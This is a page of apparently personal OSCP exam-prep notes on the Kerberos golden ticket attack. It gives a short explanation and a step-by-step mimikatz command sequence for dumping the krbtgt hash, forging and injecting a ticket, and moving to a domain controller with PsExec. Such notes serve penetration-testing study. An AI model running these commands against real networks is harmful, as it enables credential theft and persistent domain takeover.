hackervegas001
  • Introduction
  • oscp notes include Active Directory 2023
    • Active Directory
      • Enumeration
        • Traditional Approach
        • Currently Logged on Users
        • Powerview
          • Bypass AMSI
          • Domain User Enum
          • Domain Group Enumeration
          • Domain Computer and Server Enum
          • GPO and OU Enum
          • Domain Shares Enum
          • ACL Enum
        • ADRecon
        • BloodHound
      • Authentication
        • Password Hash Dumping
        • Service Account Attack Kerberoasting Attack
          • using mimikatz
          • using Rubeus
          • Using Impacket
        • AS-REP Roasting
        • Password Guessing
        • SAM for windows password
        • password/hash bruteforcing
      • Lateral Movement
        • Pass the hash
        • OverPass the hash
        • Silver Ticket Attack
        • Pass the hash attack
      • Persistence
        • Golden ticket attack
        • Domain Controller synchronization-Dumping all hashes
      • Misc
        • Login method
        • nt authority\system
    • Windows Priv Esc
      • important links
      • Enumeration
      • checking tools
        • winpeas
        • Windows exploit suggester
        • Sysinternals tools
        • Powerup
      • Escalation Path
        • UAC Bypass
        • Binary hijacking / Insecure file permissions
        • Unquoted Service path
        • kernel exploit
        • Potato attack (SEimpersonation)
          • Juicypotato
          • Printspoofer
          • JuicyPotatoNG
        • DLL/EXE Hijacking
        • Service Binary hijacking
        • Exploit msi file
    • Linux Priv Esc
      • Enumeration
      • Escalation path
        • Cron case
        • Editable /etc/passwd
        • kernel exploit
        • CP SUID
        • aria2c SUID
        • systemctl SUID
    • Commands
      • cut
      • awk
      • sed
    • Tools
      • Netcat
      • Powershell
      • Powercat
      • Nmap
      • nmblookup
      • smbclient
      • enum4linux
      • Nikto
      • Certutil (wget for windows)
      • msfvenom payload for powershell
      • iwr like wget for windows
      • ldapsearch
    • Enumeration
      • DNS Enumeration
      • Port Scanning
      • SMB Enumeration
      • NFS Enumeration
      • SMTP Enumeration
      • SNMP Enumeration
    • Web Applicaton Attacks
      • File Inclusion Vuln
      • sqli
      • misc
      • directory bruteforcing
    • files transfers
      • From Windows
      • To Windows
    • Antivirus Evasion
      • Using script in powershell
      • Using Shellter Tool
      • Veil tool
    • client side attacks
      • Exploiting Microsoft Office
        • Object Linking and Embedding
        • Macro
          • Macro Manually
          • Macro using Minitrue tool
      • Code execution via Windows Library Files
    • Port and Services
      • FTP 21
      • Pop3 110
      • smb 139 445
        • smb enumeration
          • SMB Enum
        • symlink traversal
      • SMTP 25 Enumeration
      • ssh 22
      • ms-sql 1433
      • tftp, udp port 69
      • snmp 161 udp
      • VNC PORT 5801 5901
      • UnrealIRCd IRC service
      • mysql 3306
    • Password Attacks
      • Standard Wordlist
      • Bruteforce Wordlist (Crunch)
      • Network Service Attack
        • Medusa tool
        • RDP attack using Crowbar
        • Hydra
      • Password Cracking
    • Port forwarding and Tunneling
      • Chisel (http Tunneling)
      • Port Forwarding with Rinetd tool
      • ssh Tunneling
        • Local Port Forwarding
        • Remote Port Forwarding
        • Dynamic Port Forwarding
      • Plink for windows
      • Netsh for windows
      • SShuttle
    • Misc
      • Port Scanning through script
      • Tty full interactive shell
      • rdp error
      • powershell ps1 reverse shell
      • updating wordpress cred via mysql
      • wordpress
        • updating wordpress cred via mysql
      • reverse shell via ssh
    • Powershell Empire
      • Listner, Stager and agent
      • Poweshell modules
        • selection
        • Credentials and privesc
        • lateral movement
  • 🖥️Enumeration
    • 🙂:)
      • Enumeration :)
        • FTP
          • Anonymous login
            • Default FTP Client
            • Web Browser
            • Filezilla
          • Insecure ACL (RW)
          • Dictionary Attack
        • SMB
          • SMB Null/Guest Session
            • smbmap
            • smbclient
            • impacket-smbclient
            • nmap
          • Dictionary Based Attack
            • crackmapexec
            • hydra
        • SSH
        • WinRM
        • RDP
        • SMTP
        • MYsql
        • NFS
        • SNMP
    • Exploitation
      • Windows Exploitation
      • Linux Exploitation
    • Buffer Overflow
    • Active Directory
      • Active Directory All Tools And Scripts
      • Active Directory Post Enumeration
      • Active Directory Post Exploitation
    • 🏁Writeups
      • cyberSecLabs
      • Hackthebox
        • Tjnull list
          • lame
          • brainfuck
      • Pg Play | Vulnhub
      • Pg practice
      • TryHackMe
      • To Do
Powered by GitBook
On this page
  1. oscp notes include Active Directory 2023
  2. Active Directory
  3. Persistence

Golden ticket attack

Golden Ticket attack

Going back to the explanation of Kerberos authentication, we recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is actually the password hash of a domain user account called krbtgt. If we are able to get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, or golden tickets

  1. mimikatz.exe

  2. privilege::debug

  3. lsadump::lsa /patch to get krbtgt ntlm hash

  4. kerberos::purge

  5. kerberos::golden /user:<fakeuser> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt ntlm hash> /ptt

  6. misc::cmd

  7. psexec.exe \\<dc_machine> cmd.exe With the golden ticket injected into memory, we can launch a new command prompt with misc::cmd and again attempt lateral movement with PsExec

  8. whoami

  9. whoami /group for verification

PreviousPersistenceNextDomain Controller synchronization-Dumping all hashes

Last updated 2 years ago